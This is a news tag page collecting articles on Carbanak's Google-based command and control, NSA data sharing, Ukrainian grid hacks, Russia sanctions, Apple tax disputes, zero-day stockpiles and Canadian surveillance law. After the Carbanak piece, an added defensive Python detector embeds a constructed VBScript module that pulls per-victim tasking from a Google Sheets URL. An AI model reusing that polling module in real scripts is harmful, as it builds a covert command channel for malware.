Saturday, November 18, 2017

Tag: The Treasury

Carbanak certainly has not sat idly by after years of advanced criminal campaigns targeting primarily financial institutions.

The outfit, alleged to have stolen from more than 100 banks worldwide, has popped up again with a new means of managing command and control over its malware and implants. Researchers at Forcepoint said Tuesday that an investigation into an active exploit sent in phishing messages as an RTF attachment led them to discover that the group has been using hosted Google services for command and control. Services such as Google Forms and Google Sheets are being co-opted by the group, allowing Carbanak traffic to hide in plain sight among the ordinary Google traffic that few organizations are willing to block. Forcepoint said that each time a victim is infected by the group’s malware, a Google Sheets spreadsheet is created along with a unique ID for the victim, which is used to manage interactions with the infected machine.

The attacker then manually goes into the spreadsheet, collects any data sent back from the target’s computer and loads the spreadsheet with commands and additional malware that is pulled to the compromised machine. Forcepoint said it was not aware of how many of these command and control channels were open on Google services, but said it is something that was privately disclosed to Google.

A request for comment from Google was not returned in time for publication. “The Carbanak actors continue to look for stealth techniques to evade detection,” Forcepoint said in its report published yesterday. “Using Google as an independent C&C channel is likely to be more successful than using newly created domains or domains with no reputation.” Researchers said their investigation was prompted in part by a new campaign disclosed by tr1adx, a scarcely populated website that has published four pieces of “intelligence,” primarily focusing on state-sponsored groups. On Jan. 1, it published a piece on a Carbanak campaign it was calling Digital Plagiarist.

The main tactic exposed in the report was the group’s use of tainted Office documents hosted on sites mirroring legitimate sites such as the U.S. Food and Drug Administration, the Department of the Treasury, Zyna, Atlantis Bahamas, Waldorf Astoria and many others across sectors such as manufacturing, hospitality, media and health care.

The group, which tr1adx calls the TelePort Crew, is likely Carbanak, based on domains and malware used in this campaign that are similar to those in another campaign disclosed by researchers at Trustwave last year. Forcepoint took a look at an RTF file previously used exclusively by Carbanak that includes crafted VBScript.

The document, Forcepoint said, contains an embedded OLE object disguised as an image asking the victim to click on it to view the attachment.

The image hosts the VBScript; if the victim clicks on it, a dialog box appears instructing the user to open the file, which runs the script and executes the attack. “We decoded the script and found hallmarks typical of the Carbanak group’s VBScript malware, however we also found the addition of a new ‘ggldr’ script module,” Forcepoint said. “The module is base64 encoded inside the main VBScript file along with various other VBScript modules used by the malware. When we analyzed the script we noticed that it is capable of using Google services as a C&C channel.”

Carbanak’s activities were exposed in 2015 by researchers at Kaspersky Lab, who published an extensive report explaining how the group was using advanced malware to attack more than 100 banks, stealing anywhere from $2.5 million to $10 million per bank and putting potential losses at $1 billion. Carbanak used spear phishing to infiltrate banks, moving laterally across compromised bank networks until it landed on the right system that allowed it to steal money. In some instances, Kaspersky Lab said, Carbanak would record video of system operators, which was used in concert with data obtained by implanted keyloggers to fully understand what the victim was doing on the infected machine. Kaspersky Lab said Carbanak would cash out in a number of ways: “ATMs were instructed remotely to dispense cash without any interaction with the ATM itself, with the cash then collected by mules; the SWIFT network was used to transfer money out of the organization and into criminals’ accounts; and databases with account information were altered so that fake accounts could be created with a relatively high balance, with mule services being used to collect the money.”
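As an added example (not Forcepoint's analysis tooling and not code from the original article), the script below performs the triage step the report describes: pull base64-encoded string literals out of a VBScript, decode the ones that turn out to be text, and flag any URL in the outer script or an embedded module that points at a hosted Google service. The sample VBScript, its `DecodeBase64` helper and the Sheets export path are constructed for this demonstration; only the module name `ggldr` comes from the report, and the list of Google hosts is an assumption about where Forms and Sheets traffic goes, not an indicator from the page.

```python
"""Triage helper: find base64-embedded script modules that call out to
hosted Google services (Forms/Sheets used as a C&C channel).

Added example, not Forcepoint's code. The sample VBScript, its DecodeBase64
helper and the Sheets URL path are constructed for this demonstration;
only the module name 'ggldr' comes from the report."""
import base64
import re
from typing import List

# Google hosts on which Forms, Sheets and Apps Script are served (assumed
# list). Traffic to them is normal in most networks, so a hit is a triage
# signal, not a verdict: that is exactly why the channel blends in.
GOOGLE_SERVICE_HOSTS = {
    "docs.google.com",
    "forms.google.com",
    "sheets.google.com",
    "spreadsheets.google.com",
    "script.google.com",
}

# A quoted string literal consisting of a long base64 run, optionally padded.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(/[^\s\"']*)?", re.IGNORECASE)


def _is_text(data: bytes) -> bool:
    """True if the decoded bytes look like script source rather than binary."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def extract_base64_modules(script: str) -> List[str]:
    """Decode every base64 string literal in `script` that yields text.
    Literals that are not valid base64, or that decode to binary, are skipped."""
    modules = []
    for match in B64_LITERAL.finditer(script):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if _is_text(raw):
            modules.append(raw.decode("utf-8"))
    return modules


def find_google_c2(script: str) -> List[str]:
    """Return every URL, in the script itself or in a module it carries
    base64-encoded, whose host is one of the hosted Google services."""
    hits = []
    for text in [script, *extract_base64_modules(script)]:
        for m in URL_RE.finditer(text):
            if m.group(1).lower() in GOOGLE_SERVICE_HOSTS:
                hits.append(m.group(0))
    return hits


# Constructed sample. The module polls a per-victim Sheet for tasking; the
# outer script carries it base64-encoded in a variable named after the
# 'ggldr' module Forcepoint describes. DecodeBase64 is a stand-in helper.
_MODULE_SRC = (
    "Function GetTask(uid)\r\n"
    '  Set http = CreateObject("MSXML2.XMLHTTP")\r\n'
    '  http.Open "GET", "https://docs.google.com/spreadsheets/d/" & uid '
    '& "/export?format=csv", False\r\n'
    "  http.Send\r\n"
    "  GetTask = http.responseText\r\n"
    "End Function\r\n"
)
SAMPLE_SCRIPT = (
    "Dim ggldr\r\n"
    'ggldr = "'
    + base64.b64encode(_MODULE_SRC.encode("utf-8")).decode("ascii")
    + '"\r\n'
    "Execute DecodeBase64(ggldr)\r\n"
)

if __name__ == "__main__":
    for url in find_google_c2(SAMPLE_SCRIPT):
        print("hosted-Google C&C candidate:", url)
```

The outer script contains no URL at all; the Sheets endpoint only appears after the `ggldr` literal is decoded, which is the point of the base64 wrapping. A string-based scan of the raw attachment would miss it, and a network-based rule would see nothing but TLS to docs.google.com. Per-host whitelisting of Google therefore does not help; the useful signal is the combination of a script-bearing Office attachment and a decoded module that talks to a Google document endpoint.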
Gee, what a lovely parting gift by outgoing US prez
A last-minute rule change signed off by the outgoing Obama administration has made it much easier for the NSA to share raw surveillance data with more than a dozen government agencies. The changes are tacked onto executive order 12333, which was enacted by then-President Ronald Reagan to allow intelligence agencies to share information on non-US nationals.

The new rules will allow the NSA to share unfiltered signals intelligence with other members of the intelligence community if it is deemed necessary. "The procedures permit IC [intelligence community] elements to have access, under appropriate conditions, to the unevaluated or unminimized (ie, 'raw') signals intelligence (SIGINT) information that the NSA collects pursuant to EO 12333, thus enabling elements to bring their own analytic expertise to reviewing that information and to use that information in support of their own missions," the office of the Director of National Intelligence explained today. "The procedures therefore provide an important mechanism for enhancing information sharing, integration, and collaboration in the IC." Under the terms of the changes – which were signed off by outgoing US spymaster James Clapper and the Attorney General Loretta Lynch – the NSA can now pass on information to the other 15 organizations that make up the US intelligence community.

Those 15 members are: Air Force Intelligence, Army Intelligence, the CIA, Coast Guard Intelligence, the Defense Intelligence Agency, the Department of Energy, the Department of Homeland Security, the Department of State, the Department of the Treasury, the Drug Enforcement Administration (DEA), the FBI, Marine Corps Intelligence, the National Geospatial-Intelligence Agency, the National Reconnaissance Office, and Navy Intelligence. The collected information itself can include any data slurped on a foreign national, including files, phone calls, satellite messages and faxes. It applies to communications that take place outside the US and any traffic that passes within US borders. To get their paws on this data, an intelligence organization will have to assert that it's needed for an overseas investigation, and have that request approved by a "high-level NSA official," according to a fact sheet prepared by government officials.

The requestor also has to commit to protecting the data as much as possible. US citizens can have their data surveilled in the same way on the authorization of the Attorney General, the Director of the NSA, or the head of the recipient intelligence body – or a high-level designee. The amendment also requires Uncle Sam's snoopers to undergo training on how to follow the new rules, and creates an audit trail for the information. Quite why this needed to be rushed through in the dying days of the Obama administration remains to be seen. ®
Phishing, denial of service, and remote exploitation part of hacking banquet
Hackers of unknown origin cut power supplies in Ukraine for a second time in 12 months as part of wide-ranging attacks that hit the country in December. The attacks were revealed at the S4x17 conference in Miami, where Honeywell security researcher Marina Krotofil offered reporters some detail on the exploitation that began on 16 December and raged for four days. She told Dark Reading that attackers triggered an hour-long power blackout at midnight on 17 December by infecting the Pivnichna remote power transmission facility, knocking out remote terminal units and the connected circuit breakers. Further attacks against the State Administration of Railway Transport left Ukrainians unable to purchase rail tickets, and payments were delayed when the Treasury and Pension Fund were compromised. It was the second network-centric attack to knock out power supply in Ukraine.

Attackers of suspected Russian origin targeted facilities in December 2015. Those 23 December outages affected Ukraine's Prykarpattya Oblenergo and Kyivoblenergo utilities, cutting power to some 80,000 customers for six hours. Last month's attacks also used the BlackEnergy and KillDisk malware. Other hacks included highly convincing and successful phishing attacks against an unnamed Ukrainian bank, various remote exploitation, and denial of service attacks.

The phishing attack on 14 July last year used the ancient trick of malicious Word document macros but wrapped it in high levels of obfuscation and anti-forensics. Information Systems Security Partners head of research Oleksii Yasynskyi, who worked on dissecting the hacks, reckoned the attackers were a mix of groups specialising in different aspects of offensive security, from infrastructure to obfuscation and payload delivery. Phishing emails numbered in the thousands. Whenever a payload succeeded in breaching one of the Ukrainian assets, the attackers quietly observed for months, Krotofil told Motherboard.

The attackers' origin was not disclosed, if it is known; Kiev laid blame squarely on Russia for the similar 2015 utility hacking. Krotofil told Dark Reading that Ukraine's utilities may be seen as a test bed for attacks elsewhere, something she says is common with Russian hackers. Alex Mathews, security evangelist lead with Russian SCADA and industrial control system outfit Positive Technologies, told El Reg that vulnerabilities in critical infrastructure are easy to find and difficult to get fixed. “It takes just two days to find a new SCADA flaw, yet almost a year to get it fixed," Mathews says. "The vulnerability of our critical infrastructure is evident. Those charged with protecting industrial control system and SCADA networks must acknowledge that they’re exposed to cyber threats and take steps to reduce the risk." ®

Bootnote: While there are concerns that the attacks are a test bed for further control system hacking in other countries, compromising such infrastructure cannot be done by cookie-cutter hackers. Control systems are highly specialised, with proprietary and often undocumented protocols that are not ordinarily understood outside of specialist fields. Using Ukraine as a rehearsal for hacking US energy companies, for example, is further complicated by the variance in security controls that may exist in front of and around control systems. ®
Russian Embassy responds with pic of 'LAME' duck, says move is 'Cold War deja vu'
President Barack Obama has ordered the expulsion of 35 suspected Russian spies in response to "malicious cyber activity and harassment" by Putin's government over attempts to undermine the 2016 election. In a statement issued on Thursday, Obama ordered a number of actions in response to "the Russian government’s aggressive harassment of US officials and cyber operations aimed at the US election."

Under an executive order, the Obama administration has provided additional authority for responding to the cyber threats. It has sanctioned nine entities and individuals: the GRU and the FSB, two Russian intelligence services; four individual officers of the GRU; and three companies that provided material support to the GRU’s cyber operations. He said the decision was a "necessary and appropriate response" to efforts to harm US interests in violation of established international norms of behavior. In addition, the Secretary of the Treasury is designating two Russian individuals for using cyber-enabled means to cause misappropriation of funds and personal identifying information. The State Department is also shutting down two Russian compounds, in Maryland and New York, used by Russian personnel for intelligence-related purposes, and is declaring “persona non grata” 35 Russian intelligence operatives.

Obama said the Department of Homeland Security and the Federal Bureau of Investigation are also releasing declassified technical information on Russian civilian and military intelligence service cyber activity "to help network defenders in the United States and abroad identify, detect, and disrupt Russia’s global campaign of malicious cyber activities." In a statement he said: "All Americans should be alarmed by Russia’s actions."

Incoming president Donald Trump responded in a statement that it is time to “move on to bigger and better things.” He added: "Nevertheless, in the interest of our country and its great people, I will meet with leaders of the intelligence community next week in order to be updated about the facts of this situation." The Russian Embassy in London responded with a tweet of a picture of a duck with the word LAME written across the bottom. "President Obama expels 35 🇷🇺 diplomats in Cold War deja vu. As everybody, incl 🇺🇸 people, will be glad to see the last of this hapless Adm," it tweeted.

In October, the Obama administration found that Russia took actions intended to interfere with the US election process. "These data theft and disclosure activities could only have been directed by the highest levels of the Russian government," said Obama. Obama said the actions are not the sum total of its response to Russia’s aggressive activities. "We will continue to take a variety of actions at a time and place of our choosing, some of which will not be publicised. In addition to holding Russia accountable for what it has done, the United States and friends and allies around the world must work together to oppose Russia’s efforts to undermine established international norms of behavior, and interfere with democratic governance. To that end, my Administration will be providing a report to Congress in the coming days about Russia’s efforts to interfere in our election, as well as malicious cyber activity related to our election cycle in previous elections." ®
Obama just left Donald Trump a nice little inauguration present—a fresh pack of sanctions against Russia and evidence of Russian interference in the presidential election. (Win McNamee/Getty Images)
In an executive order issued today, President Barack Obama used his emergency powers to impose sanctions on a number of Russian military and intelligence officials and also to eject 35 Russians labeled by the administration as intelligence operatives. The order was issued as a response to the breach of the Democratic National Committee's network and the targeted intrusion into e-mail accounts belonging to members of Hillary Clinton's presidential campaign. Obama made the sanctions an extension of an April 2015 executive order "to take additional steps to deal with the national emergency with respect to significant malicious cyber-enabled activities."

The order is being accompanied by the publication of data from US intelligence agencies bolstering findings that the breaches were part of an information operation to manipulate the results of the US presidential election. The data, released by the Department of Homeland Security and Federal Bureau of Investigation as a Joint Analysis Report (JAR), contains "declassified technical information on Russian civilian and military intelligence services’ malicious cyber activity, to better help network defenders in the United States and abroad identify, detect, and disrupt Russia’s global campaign of malicious cyber activities," according to an Obama administration statement. "The JAR includes information on computers around the world that Russian intelligence services have co-opted without the knowledge of their owners in order to conduct their malicious activity in a way that makes it difficult to trace back to Russia." Some of the data had been previously published by cyber-security firms, but in some cases the data is newly declassified government data.

The JAR includes information that will allow security firms and companies to identify and block malware used by Russian intelligence services, along with a breakdown of the Russian malware operators' standard methods and tactics. DHS has added these "indicators of compromise" to its Automated Indicator Sharing service. The executive order singles out the GRU (Russia's Main Intelligence Directorate), the FSB (Federal Security Service, the successor to the KGB), Esage Lab (a Web development arm of the Russian information security company Zorsecurity), the St. Petersburg-based firm Special Technology Center, and Russia's Professional Association of Designers of Data Processing Systems. It also names four individuals: GRU chief General-Lieutenant Igor Korobov, GRU Deputy Chief and Head of Signals Intelligence Sergey Aleksandrovich Gizunov, and GRU First Deputy Chiefs Igor Olegovich Kostyukov and Vladimir Stepanovich Alexseyev. The 35 Russians ejected from the US—individuals identified as intelligence operatives working out of the Russian embassy in Washington and Russia's consulate in San Francisco—were ejected not in response to the DNC and Clinton campaign hacks, but in response to "harassment of our diplomatic personnel in Russia by security personnel and police," according to a White House fact sheet issued on the executive order.

In addition to those explicitly named by the order, Obama's order applies to: "…any person determined by the Secretary of the Treasury, in consultation with the Attorney General and the Secretary of State, to be responsible for or complicit in, or to have engaged in, directly or indirectly, cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States that are reasonably likely to result in, or have materially contributed to, a significant threat to the national security, foreign policy, or economic health or financial stability of the United States and that have the purpose or effect of … tampering with, altering, or causing a misappropriation of information with the purpose or effect of interfering with or undermining election processes or institutions."

That could, if pressed aggressively, apply to a very large swath of individuals, including operators of "fake news" sites and others involved tangentially in the distribution of information that may be seen as intended to interfere with elections—including the still-unidentified individuals involved in hacking two state election commission websites. But many of the organizations in Russia that might fall under this banner are already under US sanctions. Just how aggressively these measures will be pressed will be left largely to the incoming Trump administration. President-elect Trump will find himself in a position of having to outright dismiss the evidence presented by the FBI and DHS in order to rescind the sanctions entirely. But Trump has already shrugged off "the cyber" on several occasions during the transition. On December 28, Trump responded to a question about possible sanctions over the hacking: "I think we ought to get on with our lives. I think that computers have complicated lives very greatly. The whole age of computer has made it where nobody knows exactly what is going on. We have speed, we have a lot of other things, but I’m not sure we have the kind, the security we need."
The United States Treasury Department (pictured) sells bonds to investors and corporations. Bloomberg reported that Apple holds $41.7B in US Treasury bonds, the single largest corporate holder. (Eric Gilliland)
Apple has received at least $6 per American taxpayer over the last five years in the form of interest payments on billions' worth of United States Treasury bonds, according to a Wednesday report by Bloomberg. Citing Apple’s regulatory filings and unnamed sources, the business publication found “the Treasury Department paid Apple at least $600 million and possibly much more over the past five years in the form of interest.” By taking advantage of a provision in the American tax code, Bloomberg says that Apple has “stashed much of its foreign earnings—tax-free—right here in the US, in part by purchasing government bonds.” As The Wall Street Journal reported in September, American companies are believed to be holding approximately $2 trillion in cash overseas that is shielded from US taxes. Under American law, companies must pay a 35-percent corporate tax rate on global profits when that money is brought home—so there is an incentive to keep as much of that money overseas as possible. Ars reported previously that Apple pays an effective 2.3 percent tax rate on overseas profits by using various legal tax shenanigans across several countries as a way to minimize its tax burden.

Google, Microsoft, and many other large multinational corporations engage in similar behavior. (Ars has also detailed how such arrangements typically work.) Earlier this year, the Department of Treasury announced that the White House would like to "impose a one-time transition toll charge of 14 percent on untaxed foreign earnings that US companies have accumulated overseas. The earnings subject to the one-time tax could then be repatriated without any further US tax." (During the presidential campaign, Donald Trump said he would like to see a tax holiday of 10 percent.)

Omri Marian, a tax law professor at the University of California, Irvine, told Ars that this strange bond arrangement had been around for decades. “Basically the US government is borrowing the offshore money, on which no tax was paid to the US (theoretically at 35 percent),” he e-mailed. “So the US government is ending up paying interest on borrowing money in which it theoretically has a 35 percent ownership interest. On the other hand, you could argue that if not for the exception [multinational corporations] would be discouraged from purchasing US debt, or at least disadvantaged in purchasing the debt compared to foreign MNCs who do not necessarily have to pay tax on foreign profits.”

Another tax law professor, Samuel Brunson, of Loyola University-Chicago, largely concurred, noting that the US government seems to be making the best of a questionable, albeit legal, situation. “What to think of this probably depends on how much you think Apple is cheating by keeping money offshore,” he e-mailed. “If they're cheating—if their actions are unfair—it stands to reason that getting an investment return from the government is also unfair. If it's not cheating, though, that it can effectively repatriate some of its money without paying taxes (through carefully-defined investments that the government has approved) isn't necessarily a bad thing.”
The UK government has promised to spend nearly £2 billion over the next five years to try to tackle the growing problem of cyber attacks in the country. Recent research suggested that Britain is particularly susceptible to data breaches involving compromised employee account data. Nonetheless, chancellor of the exchequer Philip Hammond claimed on Tuesday that the country is "an acknowledged global leader in cyber security." Number 11's occupant crowed that the previous Tory-led coalition government had chucked £860 million at the problem, but Hammond then undermined himself somewhat by adding that "we must now keep up with the scale and pace of the threats we face." Which underlines the fact that the government is playing catch-up in its race against cybercrims. The answer, according to the treasury, is to up taxpayer-funded spending in the fight against cyber attacks.

The chancellor said: "Our new strategy, underpinned by £1.9 billion of support over five years and excellent partnerships with industry and academia, will allow us to take even greater steps to defend ourselves in cyberspace and to strike back when we are attacked." If your toes aren't already curled enough, perhaps paymaster general Ben Gummer can help. He said: "No longer the stuff of spy thrillers and action movies, cyber-attacks are a reality and they are happening now. Our adversaries are varied—organised criminal groups, 'hacktivists,' untrained teenagers, and foreign states." Readers of these pages know that there is nothing new about baddies misbehaving on the Web.

But since the TalkTalk hack attack in October 2015, such crimes have finally gone mainstream. The treasury added that Whitehall's hefty investment would be three-pronged. It said a "world-class cyber workforce" would be developed, added that the UK would "use automated defences to safeguard citizens and businesses against growing cyber threats," and said that deterrent plans would be put in place propped up by better policing capabilities. Number 11 said it would work closely with industry partners such as Bath-based Netcraft—an outfit that specialises in Internet security services and counts clients that include Microsoft, BT, Cisco, and Intel. Hammond is also expected to announce plans to invest in the next generation of infosec experts with a new Cyber Security Research Institute, which we're told is a "virtual collection of UK universities" that will be tasked with beefing up smart phone, tablet, and laptop security "through research that could one day make passwords obsolete." The GCHQ-backed National Cyber Security Centre opened its doors for the first time last month.

By early 2017, the government has promised that the cyberhub will have a 700-strong team running the show. However, the government's so-called National Cyber Security Strategy isn't entirely welcomed by industry. ISPs recently expressed concern about regulatory meddling, arguing that the focus should be on raising awareness, rather than burdening telcos with yet more rules. As part of its cyber defence plan, Hammond's department said that the industry would be expected to adopt "a range of technical measures" including DNS filtering against malware and phishing sites, an e-mail verification system on government networks to try to prevent domain spoofing, and researching methods to move "safely beyond passwords." It hopes to also bring in a scheme to detect government network attacks. The chancellor claimed that the government had already improved its efforts against "a website serving Web-inject malware." We're told that it previously "would stay active for over a month—now it is less than two days. UK-based phishing sites would remain active for a day—now it is less than an hour. And phishing sites impersonating government’s own departments would have stayed active for two days—now it is less than five hours."

NHS trusts have, for years, been particularly susceptible to such attacks. Indeed, the Northern Lincolnshire & Goole NHS Foundation Trust remains on red alert with appointments cancelled as it battles a virus that blighted its IT systems on Sunday. This post originated on Ars Technica UK
BRUSSELS—A war of words has erupted between Europe’s competition chief and Apple CEO Tim Cook after Ireland was ordered to reclaim €13 billion (£11.1 billion/$14.5 billion) in back taxes from the company. Cook, in an interview with the Irish Independent, labelled Brussels' competition chief Margrethe Vestager’s decision as “total political crap.” He claimed Ireland was being "picked on" and that he hoped to see the Irish government launch an appeal against the ruling. On Tuesday, Vestager said that the European Commission’s two-year investigation had found Apple guilty of receiving illegal state aid from Ireland thanks to so-called sweetheart tax deals in 1991 and 2007.
She said that Ireland allowed Apple to pay an effective corporate tax rate of one percent on its European profits in 2003, down to as low as 0.005 percent in certain years. Apple, in a statement on Wednesday, said that the "number quoted by the European Commission is extremely misleading and deceptive." It added: "We paid $400 million in taxes in Ireland in 2014—considerably more than the commission’s figure suggests. We were certainly one of the largest corporate taxpayers in Ireland that year, if not the largest. In addition, we paid $400 million of current US taxes on those profits, bringing total current taxes paid to $800 million. Most importantly, the commission completely ignores the fact that the vast majority of those profits was subject to US taxation. Apple also accrued several billion dollars in US deferred taxes on those profits earned in 2014."

Vestager rejected that claim when quizzed by reporters on Thursday. "This is a decision based on the facts of the case. The figures that we used in our decision are the figures that we got from Apple themselves," she said. "There are very, very few figures in the public domain. More transparency would be a good thing, for example, a country by country reporting. If it was up to me, the non-confidential version of the decision would have been published yesterday, because that is another way of enabling everyone to see what we have decided and on what basis we have made this decision. Right now the ball is in the hands of Apple and Ireland."

She also rejected Cook’s claim that her decision was politically motivated. Vestager said: "The enforcement part of the competition portfolio does not really fit into any political picture. Even if it weren’t like this, we always have the courts to keep us in line. Because I don’t think the courts will hear any political opinions or feelings, they want the facts of the case and that is what we have to produce." Apple has said it plans to appeal against the decision. However, despite previously insisting that Ireland's government would similarly challenge the commission's ruling in the courts, an agreement to do so wasn't made by the Irish cabinet during a special meeting convened on Wednesday.

Brussels' competition chief Margrethe Vestager. (Johannes Jansson)
The US has also weighed in on the case. Last week the treasury department warned that it would "consider its options." On Wednesday, treasury secretary Jack Lew said that he was concerned that the case was an attempt to reach into income that ought to be taxed in the US. Ars asked Vestager to respond to Lew's claims about the distribution of Apple's coffers. The commissioner said: "The Apple case is about profits made by sale in Europe so obviously it is a question of tax being paid in Europe. It is a European matter and a matter for state aid rules." She added that she was looking forward to meeting Lew in person in Washington later this month. Meanwhile, Brussels' competition officials continue to investigate a similar case about Amazon's tax arrangements in the European Union. This post originated on Ars Technica UK
Apple's battle with the European Union’s competition watchdog has been backed by the US government, which on Wednesday waded into the complaint over the iPhone maker's tax arrangements. The US treasury warned in a white paper that Brussels' ongoing investigation into Apple’s tax deal with Ireland could “create an unfortunate international tax policy precedent.” On Thursday, the European Commission responded that there was “no bias” against US companies. After two years of investigations, antitrust chief Margrethe Vestager is expected to issue a decision on allegations of tax dodging by Apple in the autumn. The commission is considering whether the company used so-called “transfer pricing arrangements” to move profits around in order to avoid tax. Ireland is implicated in letting Apple pay a tiny amount of tax. Technically, this means that it may have benefited from illegal state aid. “Tax rulings may involve state aid within the meaning of EU rules if they are used to provide selective advantages to a specific company or group of companies,” the commission states.

But the US treasury warned that Vestager's office was in danger of overstepping its bounds “beyond enforcement of competition and state aid law under the TFEU [Treaty on the Functioning of the EU] into that of a supra-national tax authority.” It said it was considering “potential responses should the commission continue its present course,” adding: “a strongly preferred and mutually beneficial outcome would be a return to the system and practice of international tax cooperation that has long fostered cross-border investment between the United States and EU member states.” Vestager has already ordered the payment of more than €20 million in back taxes from Starbucks and Fiat Chrysler over similar tax deals with the Netherlands and Luxembourg, and Ireland could be instructed to reclaim up to tens of billions of dollars from Apple. The US government's bean counters are worried about the crackdown, however: "There is the possibility that any repayments ordered by the commission will be considered foreign income taxes that are creditable against US taxes owed by the companies in the United States.
If so, the companies’ US tax liability would be reduced. To the extent that such foreign taxes are imposed on income that should not have been attributable to the relevant member state, that outcome is deeply troubling, as it would effectively constitute a transfer of revenue to the EU from the US government and its taxpayers. Put another way, the US treasury appears to be saying: "we get to tax our multinationals, not the EU." Apple CEO Tim Cook has always denied any wrongdoing. The commission has also been pursuing a similar investigation against Amazon in Luxembourg and has warned that other cases may be on the way. “A substantial number of additional cases against US companies may lead to a growing chilling effect on US-EU cross-border investment,” the treasury hit back. On Thursday, the commission's spokesperson, Alexander Winterstein, said that it had taken note of the white paper, before drily saying that EU state aid rules have been in place for years. “With regard to the insinuation of bias, let me repeat what commissioner Vestager has been saying, which is that EU law and competition rules apply indiscriminately to all companies operating in Europe, whether they are big companies or small companies, whether they are companies that are European or companies from outside Europe.

There is absolutely no trace of a bias here,” he added. This post originated on Ars Technica UK
Thanks, Obama

DEF CON: While some fear the US government is hoarding a vast pool of zero-day security vulnerabilities, the reality is that it probably holds just a few dozen, according to a study by Columbia University. In a presentation at the DEF CON hacking conference in Las Vegas today, Jason Healey, senior research scholar in the university's faculty of international and public affairs, detailed his students' attempts to ascertain the number of critical bugs stockpiled in secret by the US. By keeping details of software vulnerabilities under lock and key, developers aren't made aware that they need to patch their code, allowing government agents to exploit the holes to attack targets. One problem with that is private hackers can also find the bugs and exploit them for fun and profit. Healey said he expected the amassed bugs to number in the thousands, but research suggests that it's likely to be fewer than 50 in all.

Healey was a founding member of the Joint Task Force–Computer Network Defense, the world's first joint cyber warfare unit, and has tabs on what is going on inside Washington DC. He acknowledged that we'll never know the true number of vulnerabilities; however, released documents, Snowden leaks, interviews with intelligence staff, and presidential papers suggest the number of stored flaws is much lower than people think. The use of computer vulnerabilities has split government departments, which is an advantage for researchers, since both sides brief against each other. On one side, you have the Department of Defense and the intelligence community, which would like to hoard secret zero-days for spying and online war purposes. On the other side, the Department of Commerce, the Treasury, and the Department of Homeland Security want them fixed as soon as possible. It's documented that the US has been using zero days since the early 1990s, Healey said.
In the middle of that decade, the NSA opened its Information Operations Technology Center to manage its store of vulnerabilities and exploits. This was run under the Information Assurance Directorate (IAD) – which handles cyber defense – rather than the Tailored Access Operations (TAO) unit – which hacks opponents. Healey said this was an encouraging sign. In 2002, National Security Presidential Directive 16 was issued, outlining guidelines for cyberwarfare. The unredacted sections of this still-classified directive make it clear that each intelligence agency's director is responsible for managing their stock of zero-day flaws and deciding whether or not to inform the manufacturer and get them fixed. However, this was never codified into formal instructions to government departments.

Heeeeeeeere's... Barry

That changed with the Obama administration. In the wake of the Edward Snowden leaks, the White House set a policy that vulnerabilities were to be disclosed to manufacturers by default. If government departments wanted to keep them quiet, they had to make their case to the executive branch. There was a move to make exceptions for national security issues and law enforcement, which Healey opined would have given the FBI and NSA carte blanche to ignore the rules. However, the discovery of the Heartbleed flaw seems to have stopped that. The NSA was forced to deny that it had prior knowledge of the exploitable programming blunder, a level of openness that Healey said "floored" him. Documents obtained by the Electronic Frontier Foundation show that the NSA reported 91 per cent of its vulnerabilities to manufacturers after the presidential ruling. However, they only cover the NSA – who knows what the CIA and other agencies are holding, he said. There are also ways around the new rules, Healey said.
Based on interviews, it seems the FBI's method for hacking into the iPhone wouldn't be covered under the rules, since technically the Feds only purchased a tool to crack the smartphone, not the knowledge of how it was actually done. We do know that in 2013, the NSA had a budget of $23.1m to purchase and manage computer vulnerabilities. Healey said that, given the going rate for such cracks, that would indicate the agency could afford about 75 critical zero days – but that figure could be larger. Given that a large proportion of these would be disclosed, and many others would be independently discovered by researchers, that suggested the NSA was only holding a few dozen zero days. This was confirmed when Snowden, or persons unknown, leaked the TAO hacking catalogue, which listed 50 software flaws that it had on its books.

Healey said he had checked his figures with both the former head of the NSA, Michael Hayden, and the former head of the IAD, Dickie George. Both had confirmed that his figures looked accurate, with George saying the NSA only retained three or four a year. Healey acknowledged that we'd probably never know the true number of zero days hoarded by all government agencies. Research shows it's probably not as many as people think. He also pointed out that other countries will also be harvesting these flaws, and ascertaining the number of those was even harder than doing so for the US government agencies.
Edward Snowden headlines SecTor security conference as Canadian privacy advocates await the Trudeau government's next move in the country's complex privacy and security debate. Edward Snowden’s 2013 revelations of massive state surveillance shocked the world and made it more aware of electronic privacy issues, but north of the border, Canada continues to struggle with its own. Just over a year ago, the former Conservative Canadian government, led by Stephen Harper, enacted a piece of legislation that enraged privacy advocates.

Bill C-51 extended the powers of Canada’s intelligence services, prompting an open letter from over 100 Canadian academics imploring the government to rethink it.

Even the federal Privacy Commissioner complained about it. A year later, we have a new government that has promised to overhaul things. What has been done, and where does Canada’s complex debate over privacy and national security sit now? C-51 angered privacy advocates by increasing information-sharing powers between 17 government agencies.

The Canadian Security Intelligence Service (CSIS), which is Canada’s domestic intelligence agency, can now obtain the tax records of anyone perceived to be a national security threat, for example.

The bill also permitted the disclosure of information shared between government agencies to others. C-51 gave new powers to CSIS.

They included the "disruption" mandate, which lets it take measures to reduce threats when it believes they pose a threat to the security of Canada. Legal experts have questioned the wording here, worrying that CSIS gets to determine what constitutes a threat and suggesting that it can legitimize a slew of activities including electronic surveillance without the need for the agency to ask for a warrant. All of this dismayed Snowden, who has specifically referenced Canada when warning against passing anti-terror laws that curtail civil liberties. Edward Snowden will be speaking via video link at the SecTor security conference in Toronto at 9 am on Tuesday October 18, and will be taking questions from Dark Reading readers. If you have relevant questions you would like to ask, let the SecTor team know by posting them in the comments section at the bottom of this article.
SecTor will be selecting the best to be addressed at the event.
Politically, the Conservative Harper government naturally supported the bill, having introduced it in the first place, while the left-leaning National Democratic Party (NDP) strongly opposed it.

The moderate Liberal party, which ended up winning last year’s federal election, came down in the middle, supporting the bill but with some caveats.

Trudeau: Broader oversight, narrower scope

Liberal leader and now-Prime Minister Justin Trudeau voted for the bill but vowed to temper it a little in two broad areas. The first focal point was oversight.

The Liberal government would create a multi-party oversight committee to ensure that CSIS was acting appropriately.
Snowden himself criticized Canada for poor spying oversight back in May 2015, not long before the Bill became law. CSIS hasn’t been entirely without oversight in the past.

